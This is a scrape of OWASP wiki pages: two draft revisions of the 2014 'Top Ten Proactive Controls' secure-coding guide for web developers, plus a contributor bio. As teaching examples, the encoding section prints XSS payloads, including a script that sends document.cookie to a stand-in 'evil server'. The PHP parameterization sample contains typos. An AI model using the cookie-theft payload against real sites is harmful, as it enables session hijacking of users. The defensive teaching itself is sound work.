* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide<br />
<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to Cross Site Scripting. Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include unix encoding, windows encoding, LDAP encoding, XML encoding and others.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* https://www.owasp.org/index.php/OWASP_Java_Encoder_Project<br />
* https://www.owasp.org/index.php/Category:OWASP_EnDe<br />
* https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet<br />
<br />
'''Key Tools'''<br />
* https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project<br />
* https://www.owasp.org/index.php/OWASP_JSON_Sanitizer<br />
* https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer<br />
* https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API<br />
* https://www.owasp.org/index.php/OWASP_EJSF_Project<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused. Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* https://www.owasp.org/index.php/OWASP_PHPRBAC_Project<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the Google KeyCzar project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* https://www.owasp.org/index.php/O-Saft<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7: Implement Logging, Error Handling and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet<br />
* https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model<br />
* https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project<br />
* https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* https://www.owasp.org/index.php/Threat_Modeling_Cheat_Sheet<br />
<br />
<br />
== Additional References ==<br />
<br />
[[OWASP Top Ten Project]]<br/><br />
[[OWASP Mobile Security Project]]<br/><br />
[[OWASP Secure Coding Practices - Quick Reference Guide]]<br/><br />
[[OWASP Cornucopia]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=User:Jim_Bird&diff=170580User:Jim Bird2014-03-21T15:53:56Z<p>Jim Bird: </p>
<hr />
<div>Jim Bird is an experienced software development manager and project manager, with more than 25 years of experience in software engineering, IT integration and application operations. Jim is currently a co-founder and the CTO of of a New York-based Alternative Trading System (ATS) for secure and confidential institutional stock trading. As CTO, Jim is responsible for the company's technology strategy and information security programs, as well as managing the company's software development organization.<br />
<br />
Prior to this, Jim worked as a senior consultant to IBM's global financial markets practice, and to stock exchanges and banks globally, including the Deutsche Borse, the Australian Stock Exchange, the Italian Banking Association, the Saudi Arabian Central Bank, and the Korea Exchange. For more than 10 years, he was the CTO of a software company (now part of NASDAQ OMX) that developed and implemented technology for stock exchanges, clearing houses and banks in more than 30 countries around the world. <br />
<br />
Jim has been involved over the past 3 years with SANS and OWASP on application security and secure software development. He blogs regularly about secure software development on his personal blog "Building Real Software", and at the SANS Application Security Street Fighter Blog, which he helps to manage.</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=170118OWASP Proactive Controls2014-03-14T14:47:32Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
